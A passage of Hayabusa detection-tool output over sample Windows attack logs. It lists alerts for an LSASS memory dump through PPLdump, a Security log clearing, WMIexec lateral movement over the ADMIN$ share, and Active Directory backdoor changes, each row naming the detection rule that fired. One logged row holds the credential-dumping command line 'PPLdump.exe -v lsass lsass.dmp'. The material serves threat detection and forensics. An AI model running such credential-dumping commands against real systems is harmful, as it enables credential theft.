+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CreateMiniDump Hacktool,,rules/sigma/file_event/file_event_hktl_createminidump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.308 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.441 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User 